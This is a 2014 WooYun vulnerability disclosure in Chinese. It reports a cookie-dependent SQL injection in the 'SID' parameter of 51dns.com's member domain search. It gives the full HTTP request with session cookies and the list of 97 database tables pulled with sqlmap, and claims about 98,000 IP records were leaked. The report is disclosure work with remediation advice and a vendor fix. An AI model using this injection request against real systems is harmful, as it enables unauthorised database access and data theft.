当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066769

漏洞标题:51dns主站SQL注入近10万条IP数据泄漏

相关厂商:51dns.com

漏洞作者: darkrerror

提交时间:2014-06-30 20:10

修复时间:2014-08-14 20:12

公开时间:2014-08-14 20:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-30: 细节已通知厂商并且等待厂商处理中
2014-07-01: 厂商已经确认,细节仅向厂商公开
2014-07-11: 细节向核心白帽子及相关领域专家公开
2014-07-21: 细节向普通白帽子公开
2014-07-31: 细节向实习白帽子公开
2014-08-14: 细节向公众公开

简要描述:

以为有支付漏洞,花了我1元钱啊。不过钱付了,产品没到手。

详细说明:

需要cookie的GET方式注射,注入点“SID”
GET /member/domain?gsearch=1&gdomain=&state=-1&SID=&health=-1 HTTP/1.1
Host: www.51dns.com
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Referer: https://www.51dns.com/member/domain
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: PHPSESSID=3jo3nebc2m5324ojidtq9g15l0; CNZZDATA4766672=cnzz_eid%3D570745233-1404023413-%26ntime%3D1404023528; _51dns_autoLogin=a3eeSEkZRZGH8ynFfJGoj8FH1plR%2FTnanBw5pOUw; _51dns_memberID=8e44ZrNZYV3rKacZFeIoEG6TTfU%2FgvUBAFRwiEKpqODJaA
SQLMAP证明:受牵连数据库

dbs.jpg


当前数据库“db_51dns”的所有表:
Database: db_51dns
[97 tables]
+--------------------------+
| ad |
| ad_location |
| admin_usergroups |
| admin_users |
| admin_users_commons |
| admin_users_logs |
| baidu_collection |
| captchacode |
| comment_types |
| comments |
| controllers |
| coupon_list |
| coupon_types |
| data_count |
| dns_nodes |
| dns_servers |
| dns_servers_groups |
| dns_service_views |
| dns_view_areas |
| dns_view_countries |
| dns_view_iplib |
| dns_views |
| domain_suffix |
| domain_title |
| domain_title_type |
| domains |
| domains_block_logs |
| domains_drop_lists |
| domains_groups |
| domains_log_types |
| domains_logs |
| domains_monitor_logs |
| domains_monitor_records |
| domains_month_report |
| domains_qps |
| domains_records |
| domains_screen |
| import_domainRecord_log |
| import_domain_log |
| import_domain_tasks |
| languages |
| languages_package |
| linetypes |
| links |
| locations |
| locations_groups |
| member_agent_profiles |
| member_device |
| member_dynamic_pwd |
| member_groups |
| members |
| message_templates |
| monitor_data |
| monitor_logs |
| monitor_records |
| monitor_tasks |
| monitor_warning_info |
| monitor_warning_message |
| news |
| news_categories |
| news_picture |
| notice_category |
| notice_data |
| operation_dns_type |
| operation_log |
| operator |
| order_items |
| order_items_new |
| orders |
| orders_new |
| payments_logs |
| question_answer |
| question_categories |
| question_reply |
| receipts |
| retrieve_domain_task |
| rewrite_rules |
| service_group |
| service_upgrade_prices |
| services |
| setting |
| setting_groups |
| smsServices |
| system_data |
| system_messages |
| tag_in_news |
| tags |
| tasks |
| tbl_cs_question |
| tbl_cs_question_category |
| tools_data |
| tooltip |
| try_domain |
| users_message |
| validations |
| warning_message |
| white_iplist |
+--------------------------+
97905条产品IP数据:

ip.jpg


用户表数据:

.jpg


漏洞证明:

dbs.jpg


修复方案:

构造SQL查询时,请使用参数化查询、验证输入对用户输入的数据进行全面安全检查或过滤,尤其注意检查是否包含HTML特殊字符。这些检查或过滤必须在服务器端完成,建议过滤的常见危险字符。
求高rank。

版权声明:转载请注明来源 darkrerror@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-07-01 00:38

厂商回复:

漏洞已修复。

最新状态:

暂无